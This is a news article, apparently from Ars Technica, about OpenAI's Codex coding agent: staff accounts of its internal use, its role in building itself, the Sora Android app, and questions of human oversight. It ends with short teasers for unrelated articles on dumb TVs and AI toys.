The “Codex” name itself dates back to a 2021 OpenAI model based on GPT-3 that powered GitHub Copilot’s tab completion feature. Embiricos said the name is rumored among staff to be short for “code execution.” OpenAI wanted to connect the new agent to that earlier moment, which was crafted in part by researchers who have since left the company.
“For many people, that model powering GitHub Copilot was the first ‘wow’ moment for AI,” Embiricos said. “It showed people the potential of what it can mean when AI is able to understand your context and what you’re trying to do and accelerate you in doing that.”
It’s no secret that the current command-line version of Codex bears some resemblance to Claude Code, Anthropic’s agentic coding tool that launched in February 2025. When asked whether Claude Code influenced Codex’s design, Embiricos parried the question but acknowledged the competitive dynamic. “It’s a fun market to work in because there’s lots of great ideas being thrown around,” he said. He noted that OpenAI had been building web-based Codex features internally before shipping the CLI version, which arrived after Anthropic’s tool.
OpenAI’s customers apparently love the command line version, though. Embiricos said Codex usage among external developers jumped 20 times after OpenAI shipped the interactive CLI extension alongside GPT-5 in August 2025. On September 15, OpenAI released GPT-5 Codex, a specialized version of GPT-5 optimized for agentic coding, which further accelerated adoption.
It hasn’t just been the outside world that has embraced the tool. Embiricos said the vast majority of OpenAI’s engineers now use Codex regularly. The company uses the same open-source version of the CLI that external developers can freely download, suggest additions to, and modify themselves. “I really love this about our team,” Embiricos said. “The version of Codex that we use is literally the open source repo. We don’t have a different repo that features go in.”
The recursive nature of Codex development extends beyond simple code generation. Embiricos described scenarios where Codex monitors its own training runs and processes user feedback to “decide” what to build next. “We have places where we’ll ask Codex to look at the feedback and then decide what to do,” he said. “Codex is writing a lot of the research harness for its own training runs, and we’re experimenting with having Codex monitoring its own training runs.” OpenAI employees can also submit a ticket to Codex through project management tools like Linear, assigning it tasks the same way they would assign work to a human colleague.
This kind of recursive loop, of using tools to build better tools, has deep roots in computing history. Engineers designed the first integrated circuits by hand on vellum and paper in the 1960s, then fabricated physical chips from those drawings. Those chips powered the computers that ran the first electronic design automation (EDA) software, which in turn enabled engineers to design circuits far too complex for any human to draft manually. Modern processors contain billions of transistors arranged in patterns that exist only because software made them possible. OpenAI’s use of Codex to build Codex seems to follow the same pattern: each generation of the tool creates capabilities that feed into the next.
But describing what Codex actually does presents something of a linguistic challenge. At Ars Technica, we try to reduce anthropomorphism when discussing AI models as much as possible while also describing what these systems do using analogies that make sense to general readers. People can talk to Codex like a human, so it feels natural to use human terms to describe interacting with it, even though it is not a person and simulates human personality through statistical modeling.
The system runs many processes autonomously, addresses feedback, spins off and manages child processes, and produces code that ships in real products. OpenAI employees call it a “teammate” and assign it tasks through the same tools they use for human colleagues. Whether the tasks Codex handles constitute “decisions” or sophisticated conditional logic smuggled through a neural network depends on definitions that computer scientists and philosophers continue to debate. What we can say is that a semi-autonomous feedback loop exists: Codex produces code under human direction, that code becomes part of Codex, and the next version of Codex produces different code as a result.
The most dramatic example of Codex’s internal impact, according to our interviews, came from OpenAI’s development of the Sora Android app. According to Embiricos, the tool allowed the company to create the app in record time.
“The Sora Android app was shipped by four engineers from scratch,” Embiricos told Ars. “It took 18 days to build, and then we shipped it to the app store in 28 days total,” he said. The engineers already had the iOS app and server-side components to work from, so they focused on building the Android client. They used Codex to help plan the architecture, generate sub-plans for different components, and implement those components.
Despite OpenAI’s claims of success with Codex in house, it’s worth noting that independent research has shown mixed results for AI coding productivity. A METR study published in July found that experienced open source developers were actually 19 percent slower when using AI tools on complex, mature codebases—though the researchers noted AI may perform better on simpler projects.
Ed Bayes, a designer on the Codex team, described how the tool has changed his own workflow. Bayes said Codex now integrates with project management tools like Linear and communication platforms like Slack, allowing team members to assign coding tasks directly to the AI agent. “You can add Codex, and you can basically assign issues to Codex now,” Bayes told Ars. “Codex is literally a teammate in your workspace.”
This integration means that when someone posts feedback in a Slack channel, they can tag Codex and ask it to fix the issue. The agent will create a pull request, and team members can review and iterate on the changes through the same thread. “It’s basically approximating this kind of coworker and showing up wherever you work,” Bayes said.
For Bayes, who works on the visual design and interaction patterns for Codex’s interfaces, the tool has enabled him to contribute code directly rather than handing off specifications to engineers. “It kind of gives you more leverage. It enables you to work across the stack and basically be able to do more things,” he said. He noted that designers at OpenAI now prototype features by building them directly, using Codex to handle the implementation details.
OpenAI’s approach treats Codex as what Bayes called “a junior developer” that the company hopes will graduate into a senior developer over time. “If you were onboarding a junior developer, how would you onboard them? You give them a Slack account, you give them a Linear account,” Bayes said. “It’s not just this tool that you go to in the terminal, but it’s something that comes to you as well and sits within your team.”
Given this teammate approach, will there be anything left for humans to do? When asked, Embiricos drew a distinction between “vibe coding,” where developers accept AI-generated code without close review, and what AI researcher Simon Willison calls “vibe engineering,” where humans stay in the loop. “We see a lot more vibe engineering in our code base,” he said. “You ask Codex to work on that, maybe you even ask for a plan first. Go back and forth, iterate on the plan, and then you’re in the loop with the model and carefully reviewing its code.”
He added that vibe coding still has its place for prototypes and throwaway tools. “I think vibe coding is great,” he said. “Now you have discretion as a human about how much attention you wanna pay to the code.”
Over the past year, “monolithic” large language models (LLMs) like GPT-4.5 have apparently become something of a dead end in terms of frontier benchmarking progress as AI companies pivot to simulated reasoning models and also agentic systems built from multiple AI models running in parallel. We asked Embiricos whether agents like Codex represent the best path forward for squeezing utility out of existing LLM technology.
He dismissed concerns that AI capabilities have plateaued. “I think we’re very far from plateauing,” he said. “If you look at the velocity on the research team here, we’ve been shipping models almost every week or every other week.” He pointed to recent improvements where GPT-5-Codex reportedly completes tasks 30 percent faster than its predecessor at the same intelligence level. During testing, the company has seen the model work independently for 24 hours on complex tasks.
OpenAI faces competition from multiple directions in the AI coding market. Anthropic’s Claude Code and Google’s Gemini CLI offer similar terminal-based agentic coding experiences. This week, Mistral AI released Devstral 2 alongside a CLI tool called Mistral Vibe. Meanwhile, startups like Cursor have built dedicated IDEs around AI coding, reportedly reaching $300 million in annualized revenue.
Given the well-known issues with confabulation in AI models when people attempt to use them as factual resources, could it be that coding has become the killer app for LLMs? We wondered if OpenAI has noticed that coding seems to be a clear business use case for today’s AI models with less hazard than, say, using AI language models for writing or as emotional companions.
“We have absolutely noticed that coding is both a place where agents are gonna get good really fast and there’s a lot of economic value,” Embiricos said. “We feel like it’s very mission-aligned to focus on Codex. We get to provide a lot of value to developers. Also, developers build things for other people, so we’re kind of intrinsically scaling through them.”
But will tools like Codex threaten software developer jobs? Bayes acknowledged concerns but said Codex has not reduced headcount at OpenAI, and “there’s always a human in the loop because the human can actually read the code.” Similarly, the two men don’t project a future where Codex runs by itself without some form of human oversight. They feel the tool is an amplifier of human potential rather than a replacement for it.
The practical implications of agents like Codex extend beyond OpenAI’s walls. Embiricos said the company’s long-term vision involves making coding agents useful to people who have no programming experience. “All humanity is not gonna open an IDE or even know what a terminal is,” he said. “We’re building a coding agent right now that’s just for software engineers, but we think of the shape of what we’re building as really something that will be useful to be a more general agent.”
This article was updated on December 12, 2025 at 6:50 PM to mention the METR study.
Benj Edwards
Senior AI Reporter
Smart TVs can feel like a dumb choice if you’re looking for privacy, reliability, and simplicity.
Today’s TVs and streaming sticks are usually loaded up with advertisements and user tracking, making offline TVs seem very attractive. But ever since smart TV operating systems became moneymakers in their own right, “dumb” TVs have been hard to find.
In response, we created this non-smart TV guide that includes much more than dumb TVs. Since non-smart TVs are so rare, this guide also breaks down additional ways to watch TV and movies online and locally without dealing with smart TVs’ evolution toward software-centric features and snooping. We’ll discuss a range of options suitable for various budgets, different experience levels, and different rooms in your home.
Protecting children from the dangers of the online world was always difficult, but that challenge has intensified with the advent of AI chatbots. A new report offers a glimpse into the problems associated with the new market, including the misuse of AI companies’ large language models (LLMs).
In a blog post today, the US Public Interest Research Group (PIRG) Education Fund reported its findings after testing AI toys (PDF). It described AI toys as online devices with integrated microphones that let users talk to the toy, which uses a chatbot to respond.
AI toys are currently a niche market, but they could be set to grow. More consumer companies have been eager to shoehorn AI technology into their products so they can do more, cost more, and potentially give companies user tracking and advertising data. A partnership between OpenAI and Mattel announced this year could also create a wave of AI-based toys from the maker of Barbie and Hot Wheels, as well as its competitors.